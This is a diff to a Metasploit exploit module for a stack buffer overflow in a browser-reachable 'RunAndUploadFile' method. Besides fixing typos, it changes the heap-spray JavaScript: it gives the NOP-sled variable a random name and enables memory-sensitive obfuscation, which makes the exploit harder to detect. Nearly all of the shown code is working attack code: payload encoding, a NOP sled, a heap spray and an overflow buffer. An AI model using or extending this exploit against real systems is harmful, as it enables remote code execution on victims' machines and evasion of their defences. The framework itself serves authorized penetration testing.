@@ -30,8 +30,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
         The vulnerability is found in the "RunAndUploadFile" method
         where the "OtherFields" parameter with user controlled data
-        is used to build a "Content-Dispoition" header and attach
-        contents in a insecure way which allows to overflow a buffer
+        is used to build a "Content-Disposition" header and attach
+        contents in an insecure way which allows to overflow a buffer
         in the stack.
       },
       'License'        => MSF_LICENSE,
@@ -181,11 +181,13 @@ class MetasploitModule < Msf::Exploit::Remote
     p = get_payload(my_target, cli)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
     js_nops = Rex::Text.to_unescape("\x90"*4, Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js_spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['OffsetShell']});
@@ -205,7 +207,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)
-      js_spray.obfuscate
+      js_spray.obfuscate(memory_sensitive: true)
     end
 
     bof = rand_text_alpha(my_target['Offset'])
